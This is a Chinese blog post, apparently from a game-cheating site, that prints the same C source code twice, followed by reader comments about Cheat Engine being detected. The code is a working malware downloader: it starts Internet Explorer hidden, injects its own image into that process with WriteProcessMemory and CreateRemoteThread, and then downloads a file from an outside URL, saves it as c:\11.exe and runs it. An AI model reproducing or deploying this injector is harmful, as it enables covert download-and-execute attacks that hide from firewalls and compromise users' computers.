#include
#pragma comment(lib,"user32.lib")
#pragma comment(lib,"kernel32.lib")
#pragma comment(linker, "/ENTRY:main")
#pragma comment(linker, "/subsystem:windows")
#pragma comment(linker, "/BASE:0x13150000")
HINSTANCE (WINAPI *SHELLRUN)(HWND,LPCTSTR, LPCTSTR, LPCTSTR ,LPCTSTR , int );//动态加载shell32.dll中的ShellExecuteA函数
DWORD(WINAPI *DOWNFILE) (LPCTSTR ,LPCTSTR, LPCTSTR ,DWORD, LPCTSTR);//动态加载Urlmon.dll中的UrlDownloadToFileA函数
HANDLE processhandle;
DWORD pid;
HINSTANCE hshell,hurlmon;
void download() //注入使用的下载函数
{
hshell=LoadLibrary("Shell32.dll");
hurlmon=LoadLibrary("urlmon.dll");
(FARPROC&)SHELLRUN=GetProcAddress(hshell,"ShellExecuteA");
(FARPROC&)DOWNFILE= GetProcAddress(hurlmon,"URLDownloadToFileA");
DOWNFILE(NULL,"http://www.t522.com/jdrj.rar","c:\\11.exe",0, NULL);
SHELLRUN(0,"open","c:\\11.exe",NULL,NULL,5);
ExitProcess(0);
};
void main() //主函数
{
//1.得到IE路径,并运行
char iename[MAX_PATH],iepath[MAX_PATH];
ZeroMemory(iename,sizeof(iename));
ZeroMemory(iepath,sizeof(iepath));
GetWindowsDirectory(iepath,MAX_PATH);
strncpy(iename,iepath,3);
strcat(iename,"program files\\inTernet Explorer\\iexplore.exe");
//strcat(iename,"windows\\notepad.EXE");
WinExec(iename,SW_HIDE);
Sleep(500);
//2.得到 IE process handle
HWND htemp;
htemp=FindWindow("IEFrame",NULL);
GetWindowThreadProcessId(htemp,&pid);
processhandle=OpenProcess(PROCESS_ALL_ACCESS, FALSE, pid);
//3.分配内存
HMODULE Module;
LPVOID NewModule;
DWORD Size;
LPDWORD lpimagesize;
Module = GetModuleHandle(NULL);//进程映像的基址
//得到内存镜像大小
_asm
{
push eax;
push ebx;
mov ebx,Module;
mov eax,[ebx+0x3c];
lea eax,[ebx+eax+0x50];
mov eax,[eax]
mov lpimagesize,eax;
pop ebx;
pop eax;
};
Size=(DWORD)lpimagesize;
NewModule = VirtualAllocEx(processhandle, Module, Size, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);//确定起始基址和内存映像基址的位置
//4.写内存,创建线程
WriteProcessMemory(processhandle, NewModule, Module, Size, NULL);//写数据
LPTHREAD_START_ROUTINE entrypoint;
__asm
{
push eax;
lea eax,download;
mov entrypoint,eax;
pop eax
}
CreateRemoteThread(processhandle, NULL, 0, entrypoint, Module, 0, NULL); //建立远程线程,并运行
CloseHandle(processhandle);
return;
};
#pragma comment(lib,"user32.lib")
#pragma comment(lib,"kernel32.lib")
#pragma comment(linker, "/ENTRY:main")
#pragma comment(linker, "/subsystem:windows")
#pragma comment(linker, "/BASE:0x13150000")
HINSTANCE (WINAPI *SHELLRUN)(HWND,LPCTSTR, LPCTSTR, LPCTSTR ,LPCTSTR , int );//动态加载shell32.dll中的ShellExecuteA函数
DWORD(WINAPI *DOWNFILE) (LPCTSTR ,LPCTSTR, LPCTSTR ,DWORD, LPCTSTR);//动态加载Urlmon.dll中的UrlDownloadToFileA函数
HANDLE processhandle;
DWORD pid;
HINSTANCE hshell,hurlmon;
void download() //注入使用的下载函数
{
hshell=LoadLibrary("Shell32.dll");
hurlmon=LoadLibrary("urlmon.dll");
(FARPROC&)SHELLRUN=GetProcAddress(hshell,"ShellExecuteA");
(FARPROC&)DOWNFILE= GetProcAddress(hurlmon,"URLDownloadToFileA");
DOWNFILE(NULL,"http://www.t522.com/jdrj.rar","c:\\11.exe",0, NULL);
SHELLRUN(0,"open","c:\\11.exe",NULL,NULL,5);
ExitProcess(0);
};
void main() //主函数
{
//1.得到IE路径,并运行
char iename[MAX_PATH],iepath[MAX_PATH];
ZeroMemory(iename,sizeof(iename));
ZeroMemory(iepath,sizeof(iepath));
GetWindowsDirectory(iepath,MAX_PATH);
strncpy(iename,iepath,3);
strcat(iename,"program files\\inTernet Explorer\\iexplore.exe");
//strcat(iename,"windows\\notepad.EXE");
WinExec(iename,SW_HIDE);
Sleep(500);
//2.得到 IE process handle
HWND htemp;
htemp=FindWindow("IEFrame",NULL);
GetWindowThreadProcessId(htemp,&pid);
processhandle=OpenProcess(PROCESS_ALL_ACCESS, FALSE, pid);
//3.分配内存
HMODULE Module;
LPVOID NewModule;
DWORD Size;
LPDWORD lpimagesize;
Module = GetModuleHandle(NULL);//进程映像的基址
//得到内存镜像大小
_asm
{
push eax;
push ebx;
mov ebx,Module;
mov eax,[ebx+0x3c];
lea eax,[ebx+eax+0x50];
mov eax,[eax]
mov lpimagesize,eax;
pop ebx;
pop eax;
};
Size=(DWORD)lpimagesize;
NewModule = VirtualAllocEx(processhandle, Module, Size, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);//确定起始基址和内存映像基址的位置
//4.写内存,创建线程
WriteProcessMemory(processhandle, NewModule, Module, Size, NULL);//写数据
LPTHREAD_START_ROUTINE entrypoint;
__asm
{
push eax;
lea eax,download;
mov entrypoint,eax;
pop eax
}
CreateRemoteThread(processhandle, NULL, 0, entrypoint, Module, 0, NULL); //建立远程线程,并运行
CloseHandle(processhandle);
return;
};
作者:青色咖啡@极点博客 - 青色咖啡的博客
地址:http://www.t522.com/post/9/
极点博客版权所有©转载时必须以链接形式注明作者和原始出处及本声明!
CE5.4青色咖啡汉化版
完美登录器源代码(E语言
ccyuleik 
2012/02/08 13:08
有一种美德叫做回帖
6944170
2010/12/14 21:26
梦幻挑战 换登陆器CE没发用了怎么处理谢谢了 支持你们
青色咖啡 回复于 2011/01/20 01:32
新版出来了,试试吧
http://u.115.com/file/f219562506 这里下载
6944170
2010/12/14 21:25
换登陆器CE 被检测了怎么处理啊
分页: 1/1 
1 
1
